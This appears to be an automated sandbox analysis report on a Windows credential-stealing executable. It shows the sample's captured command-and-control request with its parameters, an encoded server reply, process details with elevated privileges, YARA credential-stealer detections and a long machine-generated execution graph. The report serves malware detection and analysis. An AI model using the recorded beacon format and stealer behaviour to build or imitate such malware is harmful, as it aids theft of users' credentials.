                                                                                                        2025-01-01 21:05:08 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 26 6a 3d 26 68 77 69 64 3d 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=Zv86PG--UzeRR&j=&hwid=6EEC98F5FCD4F9CB20A4C476FD51BCB1
                                                                                                        2025-01-01 21:05:08 UTC1131INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:08 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=o1ujqok2ihddgge296gjn67etu; expires=Sun, 27 Apr 2025 14:51:47 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGgvJAKbHTs851fefsBFBvk9FGJ%2FmOHFu%2BS63N3eopVcVB3mJnauBLrkuqNRRCXosq%2BfvT5f2oXmoTehcxDm0JLrh5YY%2FL8gWhG2k3V5HdQrEb0vkC241PL4r20E6EazlU963w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb57739cc6241a6-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1615&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=983&delivery_rate=1762220&cwnd=239&unsent_bytes=0&cid=e2114b75676f7d3b&ts=476&x=0"
                                                                                                        2025-01-01 21:05:08 UTC54INData Raw: 33 30 0d 0a 31 4e 47 6c 56 33 63 59 4e 63 32 41 2b 32 63 68 67 6e 4b 6a 2f 78 41 5a 55 76 32 7a 45 37 5a 75 48 62 42 65 49 69 7a 50 58 41 57 50 6a 41 3d 3d 0d 0a
                                                                                                        Data Ascii: 301NGlV3cYNc2A+2chgnKj/xAZUv2zE7ZuHbBeIizPXAWPjA==
                                                                                                        2025-01-01 21:05:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:16:04:55
                                                                                                        Start date:01/01/2025
                                                                                                        Path:C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\UhsjR3ZFTD.exe"
                                                                                                        Imagebase:0x6c0000
                                                                                                        File size:835'112 bytes
                                                                                                        MD5 hash:51648584FFB4A6398EB1CEF4DA20E457
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:16:04:55
                                                                                                        Start date:01/01/2025
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:16:04:55
                                                                                                        Start date:01/01/2025
                                                                                                        Path:C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\UhsjR3ZFTD.exe"
                                                                                                        Imagebase:0x6c0000
                                                                                                        File size:835'112 bytes
                                                                                                        MD5 hash:51648584FFB4A6398EB1CEF4DA20E457
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:8.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:2.8%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:33
                                                                                                          execution_graph 18436 6d5860 18437 6d587b 18436->18437 18438 6d586b 18436->18438 18442 6d5965 18438->18442 18441 6d5327 ___free_lconv_mon 14 API calls 18441->18437 18443 6d597a 18442->18443 18444 6d5980 18442->18444 18445 6d5327 ___free_lconv_mon 14 API calls 18443->18445 18446 6d5327 ___free_lconv_mon 14 API calls 18444->18446 18445->18444 18447 6d598c 18446->18447 18448 6d5327 ___free_lconv_mon 14 API calls 18447->18448 18449 6d5997 18448->18449 18450 6d5327 ___free_lconv_mon 14 API calls 18449->18450 18451 6d59a2 18450->18451 18452 6d5327 ___free_lconv_mon 14 API calls 18451->18452 18453 6d59ad 18452->18453 18454 6d5327 ___free_lconv_mon 14 API calls 18453->18454 18455 6d59b8 18454->18455 18456 6d5327 ___free_lconv_mon 14 API calls 18455->18456 18457 6d59c3 18456->18457 18458 6d5327 ___free_lconv_mon 14 API calls 18457->18458 18459 6d59ce 18458->18459 18460 6d5327 ___free_lconv_mon 14 API calls 18459->18460 18461 6d59d9 18460->18461 18462 6d5327 ___free_lconv_mon 14 API calls 18461->18462 18463 6d59e7 18462->18463 18468 6d5ade 18463->18468 18469 6d5aea ___scrt_is_nonwritable_in_current_image 18468->18469 18484 6d1d71 EnterCriticalSection 18469->18484 18471 6d5af4 18474 6d5327 ___free_lconv_mon 14 API calls 18471->18474 18475 6d5b1e 18471->18475 18474->18475 18485 6d5b3d 18475->18485 18476 6d5b49 18477 6d5b55 ___scrt_is_nonwritable_in_current_image 18476->18477 18489 6d1d71 EnterCriticalSection 18477->18489 18479 6d5b5f 18480 6d5881 __dosmaperr 14 API calls 18479->18480 18481 6d5b72 18480->18481 18490 6d5b92 18481->18490 18484->18471 18488 6d1d88 LeaveCriticalSection 18485->18488 18487 6d5a0d 18487->18476 18488->18487 18489->18479 18493 6d1d88 LeaveCriticalSection 18490->18493 18492 6d5873 18492->18441 18493->18492 18556 6d7270 18559 6d1d88 LeaveCriticalSection 18556->18559 18558 6d7277 18559->18558 18867 6c5250 18868 6c526f 18867->18868 18870 6c5297 18867->18870 18873 6c53f0 18868->18873 18877 6c54a0 18870->18877 18871 6c528f 18874 6c543a std::ios_base::_Init 18873->18874 18881 6c5590 18874->18881 18878 6c54e7 std::ios_base::_Init 18877->18878 18879 6c5590 std::ios_base::_Init 30 API calls 18878->18879 18880 6c551c 18879->18880 18880->18871 18894 6c5790 18881->18894 18885 6c55cf std::ios_base::_Init 18886 6c5790 std::ios_base::_Init 5 API calls 18885->18886 18893 6c5608 std::ios_base::_Init 18885->18893 18887 6c5662 18886->18887 18901 6c58b0 18887->18901 18891 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 18892 6c5459 18891->18892 18892->18871 18893->18891 18895 6c57ab std::ios_base::_Init 18894->18895 18896 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 18895->18896 18897 6c55bd 18896->18897 18897->18885 18898 6c5810 18897->18898 18908 6c79d4 18898->18908 18902 6c58de std::ios_base::_Init 18901->18902 18903 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 18902->18903 18904 6c5679 18903->18904 18905 6c5950 18904->18905 18922 6c59f0 18905->18922 18913 6c7a6d 18908->18913 18911 6ca4bc CallUnexpected RaiseException 18912 6c79f3 18911->18912 18916 6c6820 18913->18916 18917 6c6861 std::bad_exception::bad_exception 18916->18917 18918 6caabd ___std_exception_copy 29 API calls 18917->18918 18919 6c6880 18918->18919 18920 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 18919->18920 18921 6c688a 18920->18921 18921->18911 18925 6c5a10 18922->18925 18926 6c5a27 std::ios_base::_Init 18925->18926 18929 6c2b80 18926->18929 18930 6c2b9f 18929->18930 18931 6c2b93 18929->18931 18932 6c2bac 18930->18932 18933 6c2bbf 18930->18933 18931->18893 18936 6c2c20 18932->18936 18944 6c2c90 18933->18944 18937 6c2c3e 18936->18937 18938 6c2c43 18936->18938 18947 6c2cb0 18937->18947 18940 6c2c90 std::ios_base::_Init 3 API calls 18938->18940 18941 6c2c4e 18940->18941 18942 6c2c5b 18941->18942 18951 6d1a6f 18941->18951 18942->18931 18945 6c71b3 std::ios_base::_Init 3 API calls 18944->18945 18946 6c2ca2 18945->18946 18946->18931 18948 6c2cc8 std::ios_base::_Init 18947->18948 18949 6ca4bc CallUnexpected RaiseException 18948->18949 18950 6c2cdd 18949->18950 18952 6d1cae __strnicoll 29 API calls 18951->18952 18953 6d1a7e 18952->18953 18954 6d1a8c __Getctype 11 API calls 18953->18954 18955 6d1a8b 18954->18955 20836 6c8b50 20837 6c8b5f 20836->20837 20839 6c8b83 20837->20839 20840 6d30ab 20837->20840 20841 6d30be _Fputc 20840->20841 20844 6d3118 20841->20844 20843 6d30d3 _Fputc 20843->20839 20845 6d314d 20844->20845 20846 6d312a 20844->20846 20845->20846 20849 6d3174 20845->20849 20847 6d1c08 __strnicoll 29 API calls 20846->20847 20848 6d3145 20847->20848 20848->20843 20852 6d324e 20849->20852 20853 6d325a ___scrt_is_nonwritable_in_current_image 20852->20853 20860 6cd19f EnterCriticalSection 20853->20860 20855 6d3268 20861 6d31ae 20855->20861 20857 6d3275 20870 6d329d 20857->20870 20860->20855 20862 6d2248 ___scrt_uninitialize_crt 73 API calls 20861->20862 20863 6d31c9 20862->20863 20864 6d7c0d 14 API calls 20863->20864 20865 6d31d3 20864->20865 20866 6d6664 __dosmaperr 14 API calls 20865->20866 20869 6d31ee 20865->20869 20867 6d3212 20866->20867 20868 6d5327 ___free_lconv_mon 14 API calls 20867->20868 20868->20869 20869->20857 20873 6cd1b3 LeaveCriticalSection 20870->20873 20872 6d31ac 20872->20843 20873->20872 20939 6c8700 20940 6c871b 20939->20940 20942 6c872d 20940->20942 20943 6c80f1 20940->20943 20946 6d3aee 20943->20946 20947 6d3afa ___scrt_is_nonwritable_in_current_image 20946->20947 20948 6d3b18 20947->20948 20949 6d3b01 20947->20949 20959 6cd19f EnterCriticalSection 20948->20959 20950 6d1374 __dosmaperr 14 API calls 20949->20950 20952 6d3b06 20950->20952 20954 6d1a5f __strnicoll 29 API calls 20952->20954 20953 6d3b27 20960 6d3b6c 20953->20960 20957 6c8103 20954->20957 20956 6d3b35 20974 6d3b64 20956->20974 20957->20942 20959->20953 20961 6d3b82 20960->20961 20967 6d3c0c _Ungetc 20960->20967 20962 6d3bb0 20961->20962 20963 6df42f _Ungetc 14 API calls 20961->20963 20961->20967 20964 6d8ab4 _Ungetc 29 API calls 20962->20964 20962->20967 20963->20962 20965 6d3bc2 20964->20965 20966 6d3be5 20965->20966 20968 6d8ab4 _Ungetc 29 API calls 20965->20968 20966->20967 20977 6d3c22 20966->20977 20967->20956 20969 6d3bce 20968->20969 20969->20966 20971 6d8ab4 _Ungetc 29 API calls 20969->20971 20972 6d3bda 20971->20972 20973 6d8ab4 _Ungetc 29 API calls 20972->20973 20973->20966 21004 6cd1b3 LeaveCriticalSection 20974->21004 20976 6d3b6a 20976->20957 20978 6d8ab4 _Ungetc 29 API calls 20977->20978 20979 6d3c45 20978->20979 20980 6d3c6e 20979->20980 20981 6d8ab4 _Ungetc 29 API calls 20979->20981 20986 6d3ca8 20980->20986 20990 6d87a6 20980->20990 20982 6d3c53 20981->20982 20982->20980 20984 6d8ab4 _Ungetc 29 API calls 20982->20984 20985 6d3c61 20984->20985 20987 6d8ab4 _Ungetc 29 API calls 20985->20987 20988 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 20986->20988 20987->20980 20989 6d3d26 20988->20989 20989->20967 20991 6d87b9 _Fputc 20990->20991 20994 6d87e0 20991->20994 20993 6d87ce _Fputc 20993->20986 20996 6d87f5 20994->20996 20995 6d8836 20999 6d87f9 _Fputc std::bad_exception::bad_exception 20995->20999 21000 6d8822 std::bad_exception::bad_exception 20995->21000 21001 6d5471 _Fputc WideCharToMultiByte 20995->21001 20996->20995 20998 6cd620 _Fputc 48 API calls 20996->20998 20996->20999 20996->21000 20997 6d1c08 __strnicoll 29 API calls 20997->20999 20998->20995 20999->20993 21000->20997 21000->20999 21002 6d88f1 21001->21002 21002->20999 21003 6d8907 GetLastError 21002->21003 21003->20999 21003->21000 21004->20976 19120 6c8800 19121 6c880c __EH_prolog3_GS 19120->19121 19124 6c885e 19121->19124 19125 6c8878 19121->19125 19128 6c8826 19121->19128 19136 6c80ad 19124->19136 19139 6d24ea 19125->19139 19163 6c9e1e 19128->19163 19130 6c68a0 std::ios_base::_Init 29 API calls 19130->19128 19131 6c8897 19132 6c8934 19131->19132 19134 6d24ea 45 API calls 19131->19134 19135 6c896e 19131->19135 19159 6c7beb 19131->19159 19132->19130 19134->19131 19135->19132 19166 6d3987 19135->19166 19179 6d26a5 19136->19179 19140 6d24f6 ___scrt_is_nonwritable_in_current_image 19139->19140 19141 6d2518 19140->19141 19142 6d2500 19140->19142 19462 6cd19f EnterCriticalSection 19141->19462 19144 6d1374 __dosmaperr 14 API calls 19142->19144 19145 6d2505 19144->19145 19147 6d1a5f __strnicoll 29 API calls 19145->19147 19146 6d2523 19148 6d8ab4 _Ungetc 29 API calls 19146->19148 19151 6d253b 19146->19151 19158 6d2510 19147->19158 19148->19151 19149 6d25cb 19463 6d2603 19149->19463 19150 6d25a3 19152 6d1374 __dosmaperr 14 API calls 19150->19152 19151->19149 19151->19150 19154 6d25a8 19152->19154 19156 6d1a5f __strnicoll 29 API calls 19154->19156 19155 6d25d1 19473 6d25fb 19155->19473 19156->19158 19158->19131 19160 6c7c1f 19159->19160 19162 6c7bfb 19159->19162 19477 6c908f 19160->19477 19162->19131 19164 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 19163->19164 19165 6c9e28 19164->19165 19165->19165 19167 6d3993 ___scrt_is_nonwritable_in_current_image 19166->19167 19168 6d39af 19167->19168 19169 6d399a 19167->19169 19488 6cd19f EnterCriticalSection 19168->19488 19170 6d1374 __dosmaperr 14 API calls 19169->19170 19172 6d399f 19170->19172 19174 6d1a5f __strnicoll 29 API calls 19172->19174 19173 6d39b9 19489 6d39fa 19173->19489 19176 6d39aa 19174->19176 19176->19135 19180 6d26b1 ___scrt_is_nonwritable_in_current_image 19179->19180 19181 6d26cf 19180->19181 19182 6d26b8 19180->19182 19192 6cd19f EnterCriticalSection 19181->19192 19184 6d1374 __dosmaperr 14 API calls 19182->19184 19186 6d26bd 19184->19186 19185 6d26db 19193 6d271c 19185->19193 19187 6d1a5f __strnicoll 29 API calls 19186->19187 19190 6c80b8 19187->19190 19190->19128 19192->19185 19194 6d279f 19193->19194 19195 6d2739 19193->19195 19197 6d2866 19194->19197 19198 6d8ab4 _Ungetc 29 API calls 19194->19198 19196 6d8ab4 _Ungetc 29 API calls 19195->19196 19199 6d273f 19196->19199 19229 6d26e6 19197->19229 19253 6ddaee 19197->19253 19200 6d27b4 19198->19200 19202 6d2762 19199->19202 19204 6d8ab4 _Ungetc 29 API calls 19199->19204 19203 6d27d7 19200->19203 19206 6d8ab4 _Ungetc 29 API calls 19200->19206 19202->19194 19215 6d277d 19202->19215 19203->19197 19207 6d27ee 19203->19207 19205 6d274b 19204->19205 19205->19202 19210 6d8ab4 _Ungetc 29 API calls 19205->19210 19208 6d27c0 19206->19208 19209 6d263f 43 API calls 19207->19209 19208->19203 19214 6d8ab4 _Ungetc 29 API calls 19208->19214 19212 6d27f7 19209->19212 19213 6d2757 19210->19213 19212->19229 19244 6cd31f 19212->19244 19217 6d8ab4 _Ungetc 29 API calls 19213->19217 19218 6d27cc 19214->19218 19215->19229 19233 6d263f 19215->19233 19217->19202 19220 6d8ab4 _Ungetc 29 API calls 19218->19220 19220->19203 19221 6d2839 19249 6d894a 19221->19249 19222 6d263f 43 API calls 19224 6d2820 19222->19224 19224->19221 19226 6d2826 19224->19226 19225 6d284d 19228 6d1374 __dosmaperr 14 API calls 19225->19228 19225->19229 19227 6d3987 31 API calls 19226->19227 19227->19229 19228->19229 19230 6d2714 19229->19230 19461 6cd1b3 LeaveCriticalSection 19230->19461 19232 6d271a 19232->19190 19234 6d2603 19233->19234 19235 6d260f 19234->19235 19236 6d2624 19234->19236 19238 6d1374 __dosmaperr 14 API calls 19235->19238 19237 6d2633 19236->19237 19274 6ddae3 19236->19274 19237->19215 19240 6d2614 19238->19240 19241 6d1a5f __strnicoll 29 API calls 19240->19241 19243 6d261f 19241->19243 19243->19215 19245 6d55ba __Getctype 48 API calls 19244->19245 19246 6cd32a 19245->19246 19247 6d5b9e __Getctype 48 API calls 19246->19247 19248 6cd33a 19247->19248 19248->19221 19248->19222 19250 6d895d _Fputc 19249->19250 19442 6d8981 19250->19442 19252 6d896f _Fputc 19252->19225 19254 6ddc88 19253->19254 19255 6ddc97 19254->19255 19260 6ddcac 19254->19260 19257 6d1374 __dosmaperr 14 API calls 19255->19257 19256 6ddca7 19256->19229 19258 6ddc9c 19257->19258 19259 6d1a5f __strnicoll 29 API calls 19258->19259 19259->19256 19260->19256 19261 6ddd0a 19260->19261 19262 6df42f _Ungetc 14 API calls 19260->19262 19263 6d8ab4 _Ungetc 29 API calls 19261->19263 19262->19261 19264 6ddd3a 19263->19264 19265 6e2c93 43 API calls 19264->19265 19266 6ddd42 19265->19266 19266->19256 19267 6d8ab4 _Ungetc 29 API calls 19266->19267 19268 6ddd7c 19267->19268 19268->19256 19269 6d8ab4 _Ungetc 29 API calls 19268->19269 19270 6ddd8a 19269->19270 19270->19256 19271 6d8ab4 _Ungetc 29 API calls 19270->19271 19272 6ddd98 19271->19272 19273 6d8ab4 _Ungetc 29 API calls 19272->19273 19273->19256 19275 6ddaf9 19274->19275 19276 6ddb06 19275->19276 19280 6ddb1e 19275->19280 19277 6d1374 __dosmaperr 14 API calls 19276->19277 19278 6ddb0b 19277->19278 19279 6d1a5f __strnicoll 29 API calls 19278->19279 19289 6d2630 19279->19289 19281 6ddb7d 19280->19281 19280->19289 19295 6df42f 19280->19295 19283 6d8ab4 _Ungetc 29 API calls 19281->19283 19284 6ddb96 19283->19284 19300 6e2c93 19284->19300 19287 6d8ab4 _Ungetc 29 API calls 19288 6ddbcf 19287->19288 19288->19289 19290 6d8ab4 _Ungetc 29 API calls 19288->19290 19289->19215 19291 6ddbdd 19290->19291 19291->19289 19292 6d8ab4 _Ungetc 29 API calls 19291->19292 19293 6ddbeb 19292->19293 19294 6d8ab4 _Ungetc 29 API calls 19293->19294 19294->19289 19296 6d6664 __dosmaperr 14 API calls 19295->19296 19297 6df44c 19296->19297 19298 6d5327 ___free_lconv_mon 14 API calls 19297->19298 19299 6df456 19298->19299 19299->19281 19301 6e2c9f ___scrt_is_nonwritable_in_current_image 19300->19301 19302 6e2ca7 19301->19302 19307 6e2cc2 19301->19307 19303 6d1387 __dosmaperr 14 API calls 19302->19303 19304 6e2cac 19303->19304 19305 6d1374 __dosmaperr 14 API calls 19304->19305 19329 6ddb9e 19305->19329 19306 6e2cd9 19308 6d1387 __dosmaperr 14 API calls 19306->19308 19307->19306 19309 6e2d14 19307->19309 19310 6e2cde 19308->19310 19311 6e2d1d 19309->19311 19312 6e2d32 19309->19312 19313 6d1374 __dosmaperr 14 API calls 19310->19313 19314 6d1387 __dosmaperr 14 API calls 19311->19314 19330 6dcc88 EnterCriticalSection 19312->19330 19317 6e2ce6 19313->19317 19318 6e2d22 19314->19318 19316 6e2d38 19319 6e2d6c 19316->19319 19320 6e2d57 19316->19320 19323 6d1a5f __strnicoll 29 API calls 19317->19323 19321 6d1374 __dosmaperr 14 API calls 19318->19321 19331 6e2dac 19319->19331 19322 6d1374 __dosmaperr 14 API calls 19320->19322 19321->19317 19325 6e2d5c 19322->19325 19323->19329 19327 6d1387 __dosmaperr 14 API calls 19325->19327 19326 6e2d67 19394 6e2da4 19326->19394 19327->19326 19329->19287 19329->19289 19330->19316 19332 6e2dbe 19331->19332 19333 6e2dd6 19331->19333 19334 6d1387 __dosmaperr 14 API calls 19332->19334 19335 6e3118 19333->19335 19340 6e2e19 19333->19340 19336 6e2dc3 19334->19336 19337 6d1387 __dosmaperr 14 API calls 19335->19337 19338 6d1374 __dosmaperr 14 API calls 19336->19338 19339 6e311d 19337->19339 19344 6e2dcb 19338->19344 19342 6d1374 __dosmaperr 14 API calls 19339->19342 19341 6e2e24 19340->19341 19340->19344 19348 6e2e54 19340->19348 19343 6d1387 __dosmaperr 14 API calls 19341->19343 19345 6e2e31 19342->19345 19346 6e2e29 19343->19346 19344->19326 19349 6d1a5f __strnicoll 29 API calls 19345->19349 19347 6d1374 __dosmaperr 14 API calls 19346->19347 19347->19345 19350 6e2e6d 19348->19350 19351 6e2e7a 19348->19351 19352 6e2ea8 19348->19352 19349->19344 19350->19351 19357 6e2e96 19350->19357 19353 6d1387 __dosmaperr 14 API calls 19351->19353 19354 6d5361 __strnicoll 15 API calls 19352->19354 19355 6e2e7f 19353->19355 19358 6e2eb9 19354->19358 19359 6d1374 __dosmaperr 14 API calls 19355->19359 19401 6e00cf 19357->19401 19361 6d5327 ___free_lconv_mon 14 API calls 19358->19361 19362 6e2e86 19359->19362 19360 6e2ff4 19364 6e3068 19360->19364 19367 6e300d GetConsoleMode 19360->19367 19365 6e2ec2 19361->19365 19363 6d1a5f __strnicoll 29 API calls 19362->19363 19393 6e2e91 19363->19393 19366 6e306c ReadFile 19364->19366 19368 6d5327 ___free_lconv_mon 14 API calls 19365->19368 19369 6e3084 19366->19369 19370 6e30e0 GetLastError 19366->19370 19367->19364 19371 6e301e 19367->19371 19372 6e2ec9 19368->19372 19369->19370 19375 6e305d 19369->19375 19373 6e30ed 19370->19373 19374 6e3044 19370->19374 19371->19366 19376 6e3024 ReadConsoleW 19371->19376 19377 6e2eee 19372->19377 19378 6e2ed3 19372->19378 19379 6d1374 __dosmaperr 14 API calls 19373->19379 19385 6d139a __dosmaperr 14 API calls 19374->19385 19374->19393 19389 6e30a9 19375->19389 19390 6e30c0 19375->19390 19375->19393 19376->19375 19381 6e303e GetLastError 19376->19381 19397 6dbd82 19377->19397 19383 6d1374 __dosmaperr 14 API calls 19378->19383 19384 6e30f2 19379->19384 19381->19374 19382 6d5327 ___free_lconv_mon 14 API calls 19382->19344 19386 6e2ed8 19383->19386 19388 6d1387 __dosmaperr 14 API calls 19384->19388 19385->19393 19387 6d1387 __dosmaperr 14 API calls 19386->19387 19387->19393 19388->19393 19410 6e31b5 19389->19410 19390->19393 19423 6e3459 19390->19423 19393->19382 19441 6dccab LeaveCriticalSection 19394->19441 19396 6e2daa 19396->19329 19398 6dbd96 _Fputc 19397->19398 19429 6dbf23 19398->19429 19400 6dbdab _Fputc 19400->19357 19402 6e00dc 19401->19402 19403 6e00e9 19401->19403 19404 6d1374 __dosmaperr 14 API calls 19402->19404 19405 6d1374 __dosmaperr 14 API calls 19403->19405 19407 6e00f5 19403->19407 19406 6e00e1 19404->19406 19408 6e0116 19405->19408 19406->19360 19407->19360 19409 6d1a5f __strnicoll 29 API calls 19408->19409 19409->19406 19435 6e330c 19410->19435 19412 6d53af __strnicoll MultiByteToWideChar 19414 6e32c9 19412->19414 19417 6e32d2 GetLastError 19414->19417 19420 6e31fd 19414->19420 19415 6e3257 19421 6e3211 19415->19421 19422 6dbd82 31 API calls 19415->19422 19416 6e3247 19418 6d1374 __dosmaperr 14 API calls 19416->19418 19419 6d139a __dosmaperr 14 API calls 19417->19419 19418->19420 19419->19420 19420->19393 19421->19412 19422->19421 19424 6e3493 19423->19424 19425 6e3529 ReadFile 19424->19425 19426 6e3524 19424->19426 19425->19426 19427 6e3546 19425->19427 19426->19393 19427->19426 19428 6dbd82 31 API calls 19427->19428 19428->19426 19430 6dca3f _Fputc 29 API calls 19429->19430 19431 6dbf35 19430->19431 19432 6dbf51 SetFilePointerEx 19431->19432 19434 6dbf3d _Fputc 19431->19434 19433 6dbf69 GetLastError 19432->19433 19432->19434 19433->19434 19434->19400 19436 6e3340 19435->19436 19437 6e33b1 ReadFile 19436->19437 19440 6e31cc 19436->19440 19438 6e33ca 19437->19438 19437->19440 19439 6dbd82 31 API calls 19438->19439 19438->19440 19439->19440 19440->19415 19440->19416 19440->19420 19440->19421 19441->19396 19444 6d8995 19442->19444 19451 6d89a5 19442->19451 19443 6d89ca 19446 6d89fe 19443->19446 19447 6d89db 19443->19447 19444->19443 19445 6cd620 _Fputc 48 API calls 19444->19445 19444->19451 19445->19443 19449 6d8a7a 19446->19449 19450 6d8a26 19446->19450 19446->19451 19454 6e1c12 19447->19454 19452 6d53af __strnicoll MultiByteToWideChar 19449->19452 19450->19451 19453 6d53af __strnicoll MultiByteToWideChar 19450->19453 19451->19252 19452->19451 19453->19451 19457 6e3e13 19454->19457 19460 6e3e41 _Fputc 19457->19460 19458 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 19459 6e1c2d 19458->19459 19459->19451 19460->19458 19461->19232 19462->19146 19464 6d260f 19463->19464 19465 6d2624 19463->19465 19467 6d1374 __dosmaperr 14 API calls 19464->19467 19466 6d2633 19465->19466 19468 6ddae3 43 API calls 19465->19468 19466->19155 19469 6d2614 19467->19469 19471 6d2630 19468->19471 19470 6d1a5f __strnicoll 29 API calls 19469->19470 19472 6d261f 19470->19472 19471->19155 19472->19155 19476 6cd1b3 LeaveCriticalSection 19473->19476 19475 6d2601 19475->19158 19476->19475 19478 6c9143 19477->19478 19479 6c90b3 19477->19479 19480 6c5810 std::ios_base::_Init 30 API calls 19478->19480 19481 6c58b0 std::ios_base::_Init 5 API calls 19479->19481 19483 6c9148 19480->19483 19482 6c90c5 19481->19482 19484 6c2b80 std::ios_base::_Init 30 API calls 19482->19484 19485 6c90d0 _Yarn 19484->19485 19486 6c23b0 std::ios_base::_Init 29 API calls 19485->19486 19487 6c9111 _Yarn 19485->19487 19486->19487 19487->19162 19488->19173 19490 6d3a12 19489->19490 19492 6d3a82 19489->19492 19491 6d8ab4 _Ungetc 29 API calls 19490->19491 19497 6d3a18 19491->19497 19493 6d39c7 19492->19493 19494 6df42f _Ungetc 14 API calls 19492->19494 19500 6d39f2 19493->19500 19494->19493 19495 6d3a6a 19496 6d1374 __dosmaperr 14 API calls 19495->19496 19498 6d3a6f 19496->19498 19497->19492 19497->19495 19499 6d1a5f __strnicoll 29 API calls 19498->19499 19499->19493 19503 6cd1b3 LeaveCriticalSection 19500->19503 19502 6d39f8 19502->19176 19503->19502 16601 6ca2ed 16610 6c9a80 GetModuleHandleW 16601->16610 16604 6ca2f9 16609 6ca304 16604->16609 16612 6cf214 16604->16612 16605 6ca32b 16615 6cf1ef 16605->16615 16611 6c9a8c 16610->16611 16611->16604 16611->16605 16618 6cf324 16612->16618 16616 6cf324 CallUnexpected 21 API calls 16615->16616 16617 6ca333 16616->16617 16619 6cf351 16618->16619 16620 6cf363 16618->16620 16622 6c9a80 CallUnexpected GetModuleHandleW 16619->16622 16636 6cf4be 16620->16636 16624 6cf356 16622->16624 16624->16620 16630 6cf258 GetModuleHandleExW 16624->16630 16625 6cf21f 16625->16609 16631 6cf2b8 16630->16631 16632 6cf297 GetProcAddress 16630->16632 16633 6cf2be FreeLibrary 16631->16633 16634 6cf2c7 16631->16634 16632->16631 16635 6cf2ab 16632->16635 16633->16634 16634->16620 16635->16631 16637 6cf4ca ___scrt_is_nonwritable_in_current_image 16636->16637 16651 6d1d71 EnterCriticalSection 16637->16651 16639 6cf4d4 16652 6cf3bb 16639->16652 16641 6cf4e1 16656 6cf4ff 16641->16656 16644 6cf2f3 16713 6cf2da 16644->16713 16646 6cf2fd 16647 6cf311 16646->16647 16648 6cf301 GetCurrentProcess TerminateProcess 16646->16648 16649 6cf258 CallUnexpected 3 API calls 16647->16649 16648->16647 16650 6cf319 ExitProcess 16649->16650 16651->16639 16655 6cf3c7 ___scrt_is_nonwritable_in_current_image CallUnexpected 16652->16655 16653 6cf42b CallUnexpected 16653->16641 16655->16653 16659 6d108e 16655->16659 16712 6d1d88 LeaveCriticalSection 16656->16712 16658 6cf39a 16658->16625 16658->16644 16660 6d109a __EH_prolog3 16659->16660 16663 6d1319 16660->16663 16662 6d10c1 std::ios_base::_Init 